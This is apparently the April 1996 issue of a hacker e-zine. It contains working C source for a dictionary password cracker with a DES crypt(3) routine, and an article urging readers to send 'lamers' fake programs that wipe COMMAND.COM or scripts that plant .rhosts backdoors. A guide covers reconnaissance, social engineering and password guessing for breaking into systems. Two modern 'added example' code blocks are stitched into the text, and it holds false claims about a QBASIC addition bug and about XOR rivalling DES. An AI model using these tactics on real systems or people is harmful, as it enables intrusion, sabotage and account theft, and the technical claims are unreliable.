UTOPIA

April 1996

PUBLISHED BY: Utopium

Utopia (yoo-to-pi-a), noun
  1. an imaginary island described as the place of perfect moral and social conditions.
  2. any place of perfection.
  3. any visionary plan for a perfect system of living.

Disclaimer: Everything within this publication is purely for informational purposes. By reading this you take sole responsibility for any consequences. I or any place that stores this publication take no responsibility for any actions. All information here is subject to and protected by the First Amendment of the Constitution of the United States. There is no guarantee on any information in here. If you feel that any information here may be offensive or illegal within your country then stop reading now.

Part 1 . . . . . . . . . . . . . . Introduction
Part 2 . . . . . . . . . . . . . . Source Code To A Simple Password Cracker
Part 3 . . . . . . . . . . . . . . Hackers In Reality
Part 4 . . . . . . . . . . . . . . XOR Encryption By Example
Part 5 . . . . . . . . . . . . . . So You Got A Lamer On Your Back
Part 6 . . . . . . . . . . . . . . Information Gathering

+ ------------ +
| Introduction |
+ ------------ +
By Utopium

Issue two is finally here and a lot has changed since. My hard drive got screwed and I lost a bunch of files and I am a little bored since I've been reading a bunch of tech manuals and books lately. The world is pretty much the same though and I'm not much caring about the latest developments going on in computers right now. Anyway, just plain old life as usual.

Right now I got myself into an interest of encryption and have been getting source code and information on the subject. I even have a small article here on XOR encryption if you are interested. I found that ripem.msu.edu has a great deal of files on encryption so feel free to check it out for yourself.

One thing that I am amazed at is mathematical bugs that keep popping up in software I use. The latest one I found was in QBASIC which comes with MS-DOS and it's a simple problem with addition. Run this line of code:

PRINT 3.26 + 3.25 + 2.55

And you get the result 9.059999. I find this a bit funny that the guys at Microsoft have this error in something as simple as addition. Makes you hope that they don't sell software to NASA to pilot the space shuttle. But I figure that nothing is perfect and you can never get all the bugs out of everything. At least it keeps us hackers busy.

Enough with the boring talk now so read on and enjoy issue 2 of Utopia. If you want to submit any articles, information, or letters I can publish, mail me at utopium@cyberspace.org and you can find copies of Utopia at ftp.fc.net under /pub/defcon/UTOPIA if you want to look for other issues. I'd appreciate any contributions as I really don't have the time to write this whole thing so if anyone out there wants to help me keep this publication going please send in those articles.

############################################
# Source Code To A Simple Password Cracker #
############################################

In the past you have probably just been slapping those passwd files into Cracker Jack or some other password cracker and not really bothered to wonder how they work. Well for those of you who are interested, I have some simple source code you can look at here to understand how they work. I'm assuming that you have some basic understanding of the C language so you can read this without a problem. I also included a version of crypt(3) that works in every compiler I tried it in so you shouldn't have much of a problem porting this program to any platform you want. This might even run in Windows if you had a C compiler for it :). I recommend, though, that you get ufc-crypt, because it's a lot faster and more efficient.
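
The first pass of the CRACK.C listing below looks for empty password fields, and its other passes only work when the 13-character crypt(3) strings are readable. As an added example (not code from the original issue), this is the same inspection from the administrator's side: it reads passwd-format lines and flags empty fields and exposed traditional DES hashes. The sample lines, the placeholder hash strings and names such as `classify_line` are constructed for this example.

```c
#include <stdio.h>
#include <string.h>

/* Findings for one passwd-format line (names are this example's own). */
enum finding { OK_SHADOWED, EMPTY_PASSWORD, LEGACY_DES_HASH, OTHER_HASH, MALFORMED };

/* The 64-character alphabet crypt(3) uses for salt and output. */
static const char DES_ALPHABET[] =
    "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";

/* Classify the second colon-separated field of one line and copy the
 * login name into user. Unlike strtok(), strchr() keeps empty fields,
 * so "user::..." is seen directly as an empty password. */
enum finding classify_line(const char *line, char *user, size_t userlen)
{
    const char *c1 = strchr(line, ':');
    if (!c1 || c1 == line) return MALFORMED;
    const char *c2 = strchr(c1 + 1, ':');
    if (!c2) return MALFORMED;

    size_t n = (size_t)(c1 - line);
    if (n >= userlen) n = userlen - 1;
    memcpy(user, line, n);
    user[n] = '\0';

    const char *f = c1 + 1;
    size_t flen = (size_t)(c2 - f);
    if (flen == 0) return EMPTY_PASSWORD;
    /* "x", "*", "!": the hash is stored elsewhere or the login is locked */
    if (flen == 1 || f[0] == '*' || f[0] == '!') return OK_SHADOWED;
    /* 2 salt characters + 11 output characters, all from the alphabet */
    if (flen == 13 && strspn(f, DES_ALPHABET) == 13) return LEGACY_DES_HASH;
    return OTHER_HASH;
}

/* Constructed sample in passwd layout; hash strings are placeholders. */
static const char *SAMPLE[] = {
    "root:x:0:0:root:/root:/bin/sh",
    "guest::405:100:guest:/dev/null:/bin/sh",
    "alice:abABCDEFGHIJK:1001:100:Alice:/home/alice:/bin/sh",
    "bob:$6$saltsalt$placeholderhash:1002:100:Bob:/home/bob:/bin/sh",
    "daemon:*:1:1:daemon:/:/sbin/nologin",
    "broken line without fields",
};

/* Count lines of each kind; counts[] is indexed by enum finding. */
void audit(const char **lines, size_t n, int counts[5])
{
    char user[33];
    memset(counts, 0, 5 * sizeof counts[0]);
    for (size_t i = 0; i < n; i++) {
        enum finding f = classify_line(lines[i], user, sizeof user);
        counts[f]++;
        if (f == EMPTY_PASSWORD)
            printf("%s: empty password field, lock it or set a password\n", user);
        else if (f == LEGACY_DES_HASH)
            printf("%s: readable 13-char DES hash, move it to a shadow file\n", user);
    }
}

int main(void)
{
    int c[5];
    audit(SAMPLE, sizeof SAMPLE / sizeof SAMPLE[0], c);
    return (c[EMPTY_PASSWORD] + c[LEGACY_DES_HASH]) ? 1 : 0;
}
```
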
Tinker around though and maybe you can really build a high quality program for yourself.

--BEGIN CRACK.C--
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* crypt() comes from CRYPT.C below */
char *crypt(char *pw, char *salt);

/* read one passwd line into a, then split off the login name (c) and
   the password field (d); d is NULL once the file has run out */
#define fetch(a,b,c,d) { fgets(a,130,b); c=strtok(a,":"); d=strtok(NULL,":"); }

/* prompt for a file name and strip the trailing newline */
#define ask(m,s) { printf(m); fgets(s,sizeof(s),stdin); s[strcspn(s,"\n")]=0; }

int main(){
  FILE *p,*o,*w;
  char i[50];
  char pes[130],pas[50],pps[50],pws[130];
  char *es=pes,*as=pas,*ps=pps,*ws=pws;

  ask("Password File: ",i); p=fopen(i,"r");
  ask("WordList File: ",i); w=fopen(i,"r");
  ask("Results File : ",i); o=fopen(i,"w");
  if(!p || !w || !o){ fprintf(stderr,"Can't open files\n"); exit(1); }

  fprintf(o,"*** PASS 1: NULL PASSWORDS ***\n");
  /* strtok() skips the empty field in "user::uid", so the token it
     returns is then preceded by the second ':' */
  while(ps){
    fetch(es,p,as,ps);
    if(ps) if(ps[-1]==':')
      fprintf(o,"| User [%s] has no password!\n",as);
  }
  fflush(o); rewind(p);

  fprintf(o,"*** PASS 2: ACCOUNT NAMES ***\n");
  do {
    fetch(es,p,as,ps);
    if(ps) if(!strcmp(crypt(as,ps),ps))
      fprintf(o,"| User [%s] has password [%s]\n",as,as);
  } while(ps);
  fflush(o); rewind(p);

  fprintf(o,"*** PASS 3: DICTIONARY WORDS ***\n");
  do{
    rewind(w);
    fetch(es,p,as,ps);
    if(!ps) break;                 /* end of the password file */
    do{
      fgets(ws,130,w);
      ws[strcspn(ws,"\n")]=0;      /* strip the newline */
      if(!strcmp(crypt(ws,ps),ps)){
        fprintf(o,"| User [%s] has password [%s]\n",as,ws);
        fflush(o);
        break;
      }
    } while(!feof(w));
  } while(!feof(p));

  fprintf(o,"*** FINISHED SESSION ***\n");
  return 0;
}
--END CRACK.C--

--BEGIN CRYPT.C--
#include <string.h>

/*
 * asc_bin_conv() macro translates an ASCII character to
 * a 6-bit binary number. Used to translate salts.
 */
#define asc_bin_conv(x) ((x) >= 'a' ? (x) - 59 : ((x) >= 'A' ? (x) - 53 : (x) - 46))

/* output_conv[] table is used for the reverse translation */
const char output_conv[] =
  "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";

/*
 * These tables are a part of the original DES specification
 */

/* Key permutation PC1 */
const unsigned char PC1[56] = {
  57, 49, 41, 33, 25, 17,  9,  1,
  58, 50, 42, 34, 26, 18, 10,  2,
  59, 51, 43, 35, 27, 19, 11,  3,
  60, 52, 44, 36, 63, 55, 47, 39,
  31, 23, 15,  7, 62, 54, 46, 38,
  30, 22, 14,  6, 61, 53, 45, 37,
  29, 21, 13,  5, 28, 20, 12,  4};

/* Key schedule of left shifts LS */
const unsigned char LS[16] = {
  1, 1, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 1};

/* Key permutation PC2 */
const unsigned char PC2[56] = {
  14, 17, 11, 24,  1,  5,  3, 28,
  15,  6, 21, 10, 23, 19, 12,  4,
  26,  8, 16,  7, 27, 20, 13,  2,
  41, 52, 31, 37, 47, 55, 30, 40,
  51, 45, 33, 48, 44, 49, 39, 56,
  34, 53, 46, 42, 50, 36, 29, 32};

/* Bit selection table E */
const unsigned char SE[48] = {
  32,  1,  2,  3,  4,  5,
   4,  5,  6,  7,  8,  9,
   8,  9, 10, 11, 12, 13,
  12, 13, 14, 15, 16, 17,
  16, 17, 18, 19, 20, 21,
  20, 21, 22, 23, 24, 25,
  24, 25, 26, 27, 28, 29,
  28, 29, 30, 31, 32,  1};

/* Permutation P */
const unsigned char P[32] = {
  16,  7, 20, 21, 29, 12, 28, 17,
   1, 15, 23, 26,  5, 18, 31, 10,
   2,  8, 24, 14, 32, 27,  3,  9,
  19, 13, 30,  6, 22, 11,  4, 25};

/* Selection functions ('S-boxes') */
const unsigned char S[8][4][16] = {
  { { 14,  4, 13,  1,  2, 15, 11,  8,  3, 10,  6, 12,  5,  9,  0,  7 },
    {  0, 15,  7,  4, 14,  2, 13,  1, 10,  6, 12, 11,  9,  5,  3,  8 },
    {  4,  1, 14,  8, 13,  6,  2, 11, 15, 12,  9,  7,  3, 10,  5,  0 },
    { 15, 12,  8,  2,  4,  9,  1,  7,  5, 11,  3, 14, 10,  0,  6, 13 } },
  { { 15,  1,  8, 14,  6, 11,  3,  4,  9,  7,  2, 13, 12,  0,  5, 10 },
    {  3, 13,  4,  7, 15,  2,  8, 14, 12,  0,  1, 10,  6,  9, 11,  5 },
    {  0, 14,  7, 11, 10,  4, 13,  1,  5,  8, 12,  6,  9,  3,  2, 15 },
    { 13,  8, 10,  1,  3, 15,  4,  2, 11,  6,  7, 12,  0,  5, 14,  9 } },
  { { 10,  0,  9, 14,  6,  3, 15,  5,  1, 13, 12,  7, 11,  4,  2,  8 },
    { 13,  7,  0,  9,  3,  4,  6, 10,  2,  8,  5, 14, 12, 11, 15,  1 },
    { 13,  6,  4,  9,  8, 15,  3,  0, 11,  1,  2, 12,  5, 10, 14,  7 },
    {  1, 10, 13,  0,  6,  9,  8,  7,  4, 15, 14,  3, 11,  5,  2, 12 } },
  { {  7, 13, 14,  3,  0,  6,  9, 10,  1,  2,  8,  5, 11, 12,  4, 15 },
    { 13,  8, 11,  5,  6, 15,  0,  3,  4,  7,  2, 12,  1, 10, 14,  9 },
    { 10,  6,  9,  0, 12, 11,  7, 13, 15,  1,  3, 14,  5,  2,  8,  4 },
    {  3, 15,  0,  6, 10,  1, 13,  8,  9,  4,  5, 11, 12,  7,  2, 14 } },
  { {  2, 12,  4,  1,  7, 10, 11,  6,  8,  5,  3, 15, 13,  0, 14,  9 },
    { 14, 11,  2, 12,  4,  7, 13,  1,  5,  0, 15, 10,  3,  9,  8,  6 },
    {  4,  2,  1, 11, 10, 13,  7,  8, 15,  9, 12,  5,  6,  3,  0, 14 },
    { 11,  8, 12,  7,  1, 14,  2, 13,  6, 15,  0,  9, 10,  4,  5,  3 } },
  { { 12,  1, 10, 15,  9,  2,  6,  8,  0, 13,  3,  4, 14,  7,  5, 11 },
    { 10, 15,  4,  2,  7, 12,  9,  5,  6,  1, 13, 14,  0, 11,  3,  8 },
    {  9, 14, 15,  5,  2,  8, 12,  3,  7,  0,  4, 10,  1, 13, 11,  6 },
    {  4,  3,  2, 12,  9,  5, 15, 10, 11, 14,  1,  7,  6,  0,  8, 13 } },
  { {  4, 11,  2, 14, 15,  0,  8, 13,  3, 12,  9,  7,  5, 10,  6,  1 },
    { 13,  0, 11,  7,  4,  9,  1, 10, 14,  3,  5, 12,  2, 15,  8,  6 },
    {  1,  4, 11, 13, 12,  3,  7, 14, 10, 15,  6,  8,  0,  5,  9,  2 },
    {  6, 11, 13,  8,  1,  4, 10,  7,  9,  5,  0, 15, 14,  2,  3, 12 } },
  { { 13,  2,  8,  4,  6, 15, 11,  1, 10,  9,  3, 14,  5,  0, 12,  7 },
    {  1, 15, 13,  8, 10,  3,  7,  4, 12,  5,  6, 11,  0, 14,  9,  2 },
    {  7, 11,  4,  1,  9, 12, 14,  2,  0,  6, 10, 13, 15,  3,  5,  8 },
    {  2,  1, 14,  7,  4, 10,  8, 13, 15, 12,  9,  0,  3,  5,  6, 11 } } };

/* Final permutation IP^-1 */
const unsigned char FP[64] = {
  40,  8, 48, 16, 56, 24, 64, 32,
  39,  7, 47, 15, 55, 23, 63, 31,
  38,  6, 46, 14, 54, 22, 62, 30,
  37,  5, 45, 13, 53, 21, 61, 29,
  36,  4, 44, 12, 52, 20, 60, 28,
  35,  3, 43, 11, 51, 19, 59, 27,
  34,  2, 42, 10, 50, 18, 58, 26,
  33,  1, 41,  9, 49, 17, 57, 25};

/* 64-bit bitvector type */
typedef unsigned char vec64[64];

/* return buffer */
static char crypt_return[16];

/* interfaced as the UNIX crypt() */
char *crypt (char *pw, char *salt)
{
  int i,j,s,t,cs,l,sb,p1,p2;
  char *ret;
  vec64 B,K,T,T2;
  unsigned char KP[16][48];
  unsigned char E[48];

  /* Convert pw into a bitvector (7 bits per character, 8 characters at most) */
  memset (K, 0, 64);
  for( i = 0; (i < 64) && (*pw != '\0'); pw++ )
  {
    K[i++] = (*pw >> 6) & 1;
    K[i++] = (*pw >> 5) & 1;
    K[i++] = (*pw >> 4) & 1;
    K[i++] = (*pw >> 3) & 1;
    K[i++] = (*pw >> 2) & 1;
    K[i++] = (*pw >> 1) & 1;
    K[i++] = *pw & 1;
    i++;
  }

  /*
   * combine PC1, LS and PC2 - tables into one for key generation
   * KP[i][j] is used to generate the iteration key K_i
   */
  cs = 0;
  for (i = 0; i < 16; i++)
  {
    cs += LS[i];
    for (j = 0; j < 48; j++)
    {
      l = PC2[j] - 1;
      l = (l < 28) ? (l+cs) % 28 : (l+cs) % 28 + 28;
      KP[i][j] = PC1[l]-1;
    }
  }

  /* copy salt to the beginning of the return buffer */
  ret = crypt_return;
  *ret++ = salt[0];
  *ret++ = salt[1];

  /*
   * permute the E table according to the salt value
   * this is the only actual change in the DES algorithm!
   */
  s = ((asc_bin_conv(salt[1])) << 6) | (asc_bin_conv(salt[0]));
  memcpy(E, SE, 48);
  for( i = 0; i < 12; i++)
    if( ((s >> i) & 1) != 0)
    {
      t = E[i];
      E[i] = E[i+24];
      E[i+24] = t;
    }

  memset (T, 0, 64);            /* all zero : no need for IP */
  for (cs = 0; cs < 25; cs++)   /* DES is called 25 times */
    for (i = 0; i < 16; i++)    /* 16 DES iterations */
    {
      /* do PC1-LS-PC2 key-shuffle and xor with the E-expanded left side */
      for (j = 0; j < 48; j++)
        B[j] = T[E[j]+31] ^ K[KP[i][j]];

      /* do sbox - substitution */
      p1 = 0; p2 = 3;
      for (j = 0; j < 8; j++)
      {
        sb = S[j][(B[p1] << 1) | B[p1+5]]
                 [(B[1+p1] << 3) | (B[2+p1] << 2) | (B[3+p1] << 1) | B[4+p1]];
        for (l = 0; l < 4; l++)
          T2[p2-l] = (sb >> l) & 1;
        p1 += 6; p2 += 4;
      }

      /* permutation P and xor with the right side */
      for (j = 0; j < 32; j++)
        T[j] ^= T2[P[j]-1];

      /* swap the halves (not in the last iteration!) */
      if (i != 15)
        for (j = 0; j < 32; j++)
        {
          l = T[j];
          T[j] = T[j+32];
          T[j+32] = l;
        }
    }

  /* final permutation IP^-1 */
  memcpy(T2, T, 64);
  for(i = 0; i < 64; i++)
    T[i] = T2[FP[i]-1];

  /* Output conversion */
  for (i = 0; i < 60; i += 6 )
    *ret++ = output_conv[ T[i] << 5 | T[i+1] << 4 | T[i+2] << 3 |
                          T[i+3] << 2 | T[i+4] << 1 | T[i+5] ];

  /* the last character has only 4 bits */
  *ret++ = output_conv[T[60] << 5 | T[61] << 4 | T[62] << 3 | T[63] << 2];

  /* return */
  *ret++ = '\0';
  return crypt_return;
}
--END CRYPT.C--

(*)(*)(*)(*)(*)(*)(*)(*)
(*)Hackers in Reality(*)
(*)(*)(*)(*)(*)(*)(*)(*)
[By Utopium]

The Mentor probably gave one of the best descriptions of hackers when he wrote the Hacker Manifesto. Unfortunately, some people are not taking it seriously and there is a lot of confusion and craziness about hackers today. I thought I would write something about this because I am sick of all the stupid things being said about hackers and want some people to understand.

Any of you out there that don't know anything about hackers and are somehow reading this, my guess is that you see us as criminals who transfer money from banks and steal top secret information from military sites. Sorry to say but we are not criminal like that. Those things are what spies and bank robbers do. If you hear something on the news about a hacker doing these things or some other malicious acts, that's just the media and law enforcement officials making the image.

For those who are not technically smart, or lamers, I just want you to stop calling yourselves hackers because you are making things worse. Many of you roam around America Online and use AOHell and programs like it and claim that you are elite because you talk cool and run lots of macros. You fill newsgroups with bogus and often pathetic comments and information. You even now get search engines like Yahoo! to have your own section where people think you are real hackers because you have lots of graphics and anarchy files.
Lamers like you are what cause the rest of the world to think that we are immature, evil, and even criminal. You all need to stop what you're doing and become real hackers if you want to call yourself one.

What the hell do I define a hacker as? Overall I think of a hacker as someone who wants to learn how computers and networks operate. We use our skills in accessing systems to further our knowledge and understanding. We don't mean any real harm to anyone and even would like to help others with our knowledge. Hacking is a lifestyle in which you are only judged by your mind and not what type of person you are and where you are from.

Honestly I know some things may sound pretty stupid in this article but I just have to get this out because the world today is making me sick on how they view and treat hackers. Writing this won't change the world but hopefully it will influence a few people on what reality is.

* * * * * * * * * * * * * * * *
   XOR Encryption By Example
* * * * * * * * * * * * * * * * *
          By: Utopium
      * * * * * * * * *

For those of you who are still somewhat new to computers you probably have never heard of XOR. The Exclusive OR system was first used in assembly language for bit manipulation but has now been made to work in many programming languages. What XOR does is compare two numbers in binary form and return a new number based on the bits of the first two. Any bits in the same position with the same value are set to 0 while any that have different values are set to 1. Here's an example of how it works:

    00000101 (5)
XOR 00000110 (6)
  = 00000011 (3)

You can see this is pretty simple and can be done on paper if you wanted to do it that way. XORing 5 with 6 brings the result of 3 since the third bit of each both have the same value while the first and second have unequal values. I could go into more detail about bit manipulation but that should be left for when you want to get deeper into programming.

You should see how encryption works into this by now. By XORing a number with a certain key value you obscure it, until you run the same operation again to decrypt the data. There is no need to make separate encryption and decryption functions, as XORing the encrypted data with the same key value will return it to its original form. You can try this yourself by taking the example and XORing 3 by 6 to find that the result will be 5. This can make things pretty convenient.

Now to be honest with you, this encryption is very insecure and anyone can make a simple program that will break it in minutes so you don't want to use this to encrypt confidential or personal information. So why would you use this? Well when you encrypt certain data within a program like a cheat code in a game or a password it makes it a lot tougher to crack since you can't just simply crack a whole executable file. Lots of shareware authors use this for the registration codes they have and virus writers can evade virus scanners better by encrypting certain instruction code. Using this you can make sure no one can easily see data you don't want them to see in your programs.

I made a little program in BASIC which does simple encryption on a text file by taking a password and modifying the number value of it to something that can be used in this simple program. Here's the source:

LINE INPUT "Input File: ", inf$
LINE INPUT "Output File: ", outf$
LINE INPUT "Password: ", passwd$
OPEN inf$ FOR INPUT AS #1
OPEN outf$ FOR OUTPUT AS #2
' add up the character codes of the password
FOR n = 1 TO LEN(passwd$)
  pn = pn + ASC(MID$(passwd$, n, 1))
NEXT n
' halve the sum until it fits in one byte; this is the key
WHILE pn > 255
  pn = INT(pn / 2)
WEND
' XOR every byte of the input with the key
WHILE NOT EOF(1)
  bscd$ = INPUT$(1, 1)
  PRINT #2, CHR$(ASC(bscd$) XOR pn);
WEND
CLOSE

As you can see this is pretty simple and small so it shouldn't be hard to implement into whatever you want. This uses an 8-bit key but if you want something a little more secure you can have a 16 or 32-bit key and encrypt data in blocks of the same size as the key.
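
To make the warning about this scheme concrete, here is an added example (not part of the original article) that ports the key derivation from the BASIC listing to C and shows two things: different passwords collapse onto the same key byte, and trying all 256 keys while scoring the output for text recovers the key at once. The sample text, the password "utopia" and the function names are constructed for this example.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Port of the BASIC key derivation: add up the character codes, then
 * halve until the value fits in a byte. Any sum above 255 ends up in
 * 128..255, so a realistic password selects one of only 128 keys. */
unsigned char derive_key(const char *passwd)
{
    unsigned long pn = 0;
    for (; *passwd; passwd++) pn += (unsigned char)*passwd;
    while (pn > 255) pn /= 2;
    return (unsigned char)pn;
}

/* The same routine encrypts and decrypts. */
void xor_buf(unsigned char *buf, size_t n, unsigned char key)
{
    for (size_t i = 0; i < n; i++) buf[i] ^= key;
}

/* Score a trial decryption: letters and spaces count for it,
 * unprintable bytes count heavily against it. */
static int score(const unsigned char *ct, size_t n, unsigned char key)
{
    int s = 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = ct[i] ^ key;
        if (isalpha(c) || c == ' ') s++;
        else if (!isprint(c) && c != '\n') s -= 5;
    }
    return s;
}

/* Try every key and keep the one whose output looks most like text. */
unsigned char recover_key(const unsigned char *ct, size_t n)
{
    int best = -1000000;
    unsigned char bestk = 0;
    for (int k = 0; k < 256; k++) {
        int s = score(ct, n, (unsigned char)k);
        if (s > best) { best = s; bestk = (unsigned char)k; }
    }
    return bestk;
}

int main(void)
{
    /* Constructed sample plaintext and password. */
    unsigned char msg[] = "The registration code is stored in this file.\n";
    size_t n = sizeof msg - 1;
    unsigned char k = derive_key("utopia");

    xor_buf(msg, n, k);                       /* encrypt */
    unsigned char guess = recover_key(msg, n);
    printf("derived key %u, recovered key %u, \"RR\" also derives %u\n",
           (unsigned)k, (unsigned)guess, (unsigned)derive_key("RR"));
    xor_buf(msg, n, guess);                   /* decrypt with the recovered key */
    printf("%s", (char *)msg);
    return 0;
}
```

The search needs no knowledge of the password at all, which is why a longer or stranger password does nothing for this scheme.
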

Encrypting multiple times using different keys each time can also bring a little more security if needed. Using this method of encryption on your programs can be very helpful for any situation. This is just a small example of encryption which you can make probably as powerful as the DES or IDEA methods. Experiment with this a little and you should be able to add that little feature you just needed on your programs.

=================================
 So You Got A Lamer On Your Back
=================================

Don't you just hate it when you have some idiot on your back who keeps bothering you? You just get real annoyed and start flaming him and he flames you back for stupid reasons and he seems to just make you want to go nuts. Well don't get too angry, because there are better ways to get rid of the pest.

For those really annoying lamers who go "Can someone send me a program to change my grades?" or "Send me k-rad warez so I can hack the Pentagon and be 31337!" you should stop and think for a minute. If you want them to leave you alone, give them what they want. Obviously there are no such programs to do these things; all you really got to do is make it look like it does something while it really just screws them over. Something that kills their COMMAND.COM or something else should cut them off for a while as they complain to someone else or try and actually learn how to use a computer. Once you slapped this together just send it off with a little friendly note on how to use the program and you shouldn't have to worry about them.

Lamers on IRC can be the worst as they may have some bots that go crazy and think they are powerful because their nick has alternating upper and lower case letters. Some seem to actually know enough to be on a shell account and use a simple IRC client, but they don't know much more than that. If they were to ask you for a bot or some other script they could use, be nice and DCC one over.
Make sure that you have a ready made script which, when they run it, will modify their .rhosts file to instantly let you in their shell. Now you can have fun doing whatever you feel in their shell.

One thing strange is that lamers like to collect information which can actually be of some use. You may be in need of this but they say that they need something big in exchange. Just as before, give them what they want. Act pleasant and give them bogus data saying it is information on military sites. A number of people can be fooled by the simple output of a netstat or some other information service. If it's enough beyond their understanding they will probably fall for it and send that info you needed.

You don't need to talk harshly or annoy a lamer back in order to be rid of their presence; a kinder approach can be the best. Using this guise can help greatly in taking care of your problems. Just have a little imagination and you should come up with a number of ideas to keep a peaceful hacker life.

/-----------------------\
| INFORMATION GATHERING |
\-----------------------/
     \ BY: UTOPIUM /
      \_____________/

You know I get real annoyed when I see a post by someone asking to get a program to hack any computer they want or want someone to teach them to hack within a few hours. If you're one of those people you better read this or one of the things in the previous article may happen to you.

When you want to hack a system, you first need to find out what you're dealing with. Say it's some internet provider which gets on your nerves or a company which has some things in their drives that interest you. Whatever it is you must be able to understand the system in order to use it.

If the place is nearby you'll want to go there and scout around. Hang around the building and see what you can see at desks or other places. Trashing is something that will help out a lot.
Finding documents on certain ways of accessing their network and info on what kind of operating system is run are the most crucial things. Also find information about what they do and anything like that. If you want to get even more information, do a little social engineering from phone numbers you found trashing and also do mail requests for information if they make it freely available.

Once you have all this, you'll want to do some information searching on the computer to learn more about the actual software and protocols. The WHOIS service can easily give some data like other sites, names, and e-mail addresses of superusers. Use finger extensively by first doing something like finger @host.com and then fingering root, sysadm, and any other users you know of, so as to obtain information on what a password could possibly be, or a phone number a user may place in their .plan file which can be used for social engineering. Since the web is also expanding to include almost anything imaginable, check out the site's web pages and learn more about how they are organized and such.

Now that you have gathered data on the types of operating systems and networks, a little research is in order. If you don't know about the systems they use, find any documentation you can get your hands on. But if you already know a good deal, it's still a good idea to brush up so as not to make any mistakes.

With all this knowledge in your head, it's time to break in. There are various methods for this such as simply guessing passwords or using a bug in a certain service they have like sendmail. After successfully breaching their security in this method, you can freely explore and hack your way into higher levels of access.

All you need to know when doing all of this is that you need to obtain as much information as you can on your goal. With a little dedication and creativity, you should be able to breach almost any system of your choosing.
What I described here is only an example of the many ways to successfully hack a computer system.